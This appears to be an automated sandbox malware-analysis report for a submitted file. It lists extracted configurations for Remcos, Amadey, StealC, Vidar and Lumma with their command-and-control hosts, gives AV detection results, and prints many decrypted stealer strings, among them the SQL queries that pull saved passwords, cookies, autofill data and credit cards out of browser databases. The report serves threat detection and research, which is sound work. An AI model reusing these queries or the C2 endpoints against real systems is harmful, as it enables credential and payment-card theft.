Source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["dpdnow.duckdns.org:8452:1"], "Assigned name": "DPDNOW", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A34JIZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 00000009.00000002.2046814392.00000000008B1000.00000040.00000001.01000000.0000000C.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 26.2.ed55d3f620.exe.b60000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "presticitpo.store", "scriptyprefej.store", "thumbystriw.store", "crisiwarny.store", "navygenerayk.store", "founpiuer.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.206/746f34465cf17784/freebl3.dllu

Virustotal: Detection: 18%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Remcos\remcos.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 45%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Remcos\remcos.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Joe Sandbox ML: detected
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: INSERT_KEY_HERE
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 30
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 11
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 20
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: 24
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetProcAddress
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: LoadLibraryA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: lstrcatA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: OpenEventA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateEventA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CloseHandle
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Sleep
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetUserDefaultLangID
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: VirtualAllocExNuma
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: VirtualFree
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetSystemInfo
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: VirtualAlloc
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HeapAlloc
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetComputerNameA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: lstrcpyA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetProcessHeap
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetCurrentProcess
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: lstrlenA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ExitProcess
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GlobalMemoryStatusEx
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetSystemTime
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SystemTimeToFileTime
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: advapi32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: gdi32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: user32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: crypt32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ntdll.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetUserNameA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateDCA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetDeviceCaps
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ReleaseDC
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CryptStringToBinaryA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sscanf
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: VMwareVMware
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HAL9TH
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: JohnDoe
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DISPLAY
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %hu/%hu/%hu
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: http://185.215.113.206
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: bksvnsj
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: /6c4adf523b719729.php
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: /746f34465cf17784/
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: tale
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetEnvironmentVariableA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetFileAttributesA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GlobalLock
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HeapFree
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetFileSize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GlobalSize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: IsWow64Process
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Process32Next
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetLocalTime
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: FreeLibrary
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetTimeZoneInformation
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetSystemPowerStatus
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetVolumeInformationA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetWindowsDirectoryA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Process32First
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetLocaleInfoA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetUserDefaultLocaleName
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetModuleFileNameA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DeleteFileA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: FindNextFileA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: LocalFree
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: FindClose
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SetEnvironmentVariableA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: LocalAlloc
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetFileSizeEx
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ReadFile
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SetFilePointer
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: WriteFile
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateFileA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: FindFirstFileA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CopyFileA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: VirtualProtect
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetLastError
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: lstrcpynA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: MultiByteToWideChar
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GlobalFree
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: WideCharToMultiByte
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GlobalAlloc
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: OpenProcess
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: TerminateProcess
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetCurrentProcessId
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: gdiplus.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ole32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: bcrypt.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: wininet.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: shlwapi.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: shell32.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: psapi.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: rstrtmgr.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateCompatibleBitmap
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SelectObject
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BitBlt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DeleteObject
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateCompatibleDC
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipGetImageEncodersSize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipGetImageEncoders
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdiplusStartup
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdiplusShutdown
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipSaveImageToStream
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipDisposeImage
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GdipFree
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetHGlobalFromStream
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CreateStreamOnHGlobal
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CoUninitialize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CoInitialize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CoCreateInstance
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptDecrypt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptSetProperty
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptDestroyKey
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetWindowRect
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetDesktopWindow
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetDC
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CloseWindow
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: wsprintfA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: EnumDisplayDevicesA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetKeyboardLayoutList
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CharToOemW
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: wsprintfW
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RegQueryValueExA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RegEnumKeyExA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RegOpenKeyExA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RegCloseKey
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RegEnumValueA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CryptBinaryToStringA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CryptUnprotectData
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SHGetFolderPathA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ShellExecuteExA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetOpenUrlA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetConnectA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetCloseHandle
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetOpenA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HttpSendRequestA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HttpOpenRequestA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetReadFile
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: InternetCrackUrlA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: StrCmpCA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: StrStrA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: StrCmpCW
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PathMatchSpecA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: GetModuleFileNameExA
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RmStartSession
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RmRegisterResources
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RmGetList
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: RmEndSession
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_open
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_prepare_v2
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_step
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_column_text
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_finalize
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_close
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_column_bytes
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: sqlite3_column_blob
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: encrypted_key
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PATH
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: NSS_Init
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: NSS_Shutdown
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PK11_FreeSlot
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PK11_Authenticate
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: PK11SDR_Decrypt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: C:\ProgramData\
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: browser:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: profile:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: url:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: login:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: password:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Opera
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: OperaGX
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Network
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: cookies
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: .txt
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: TRUE
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: FALSE
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: autofill
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT name, value FROM autofill
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: history
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: cc
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: name:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: month:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: year:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: card:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Cookies
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Login Data
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Web Data
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: History
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: logins.json
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: formSubmitURL
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: usernameField
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: encryptedUsername
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: encryptedPassword
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: guid
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: cookies.sqlite
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: formhistory.sqlite
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: places.sqlite
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: plugins
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Local Extension Settings
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Sync Extension Settings
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: IndexedDB
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Opera Stable
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Opera GX Stable
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: CURRENT
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: chrome-extension_
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: _0.indexeddb.leveldb
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Local State
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: profiles.ini
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: chrome
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: opera
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: firefox
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: wallets
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %08lX%04lX%lu
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ProductName
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: x32
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: x64
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: ProcessorNameString
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DisplayName
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: DisplayVersion
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: Network Info:
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - IP: IP?
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: - Country: ISO?
Source: 30.2.ed55d3f620.exe.5ef0000.2.unpack	String decryptor: System Summary:
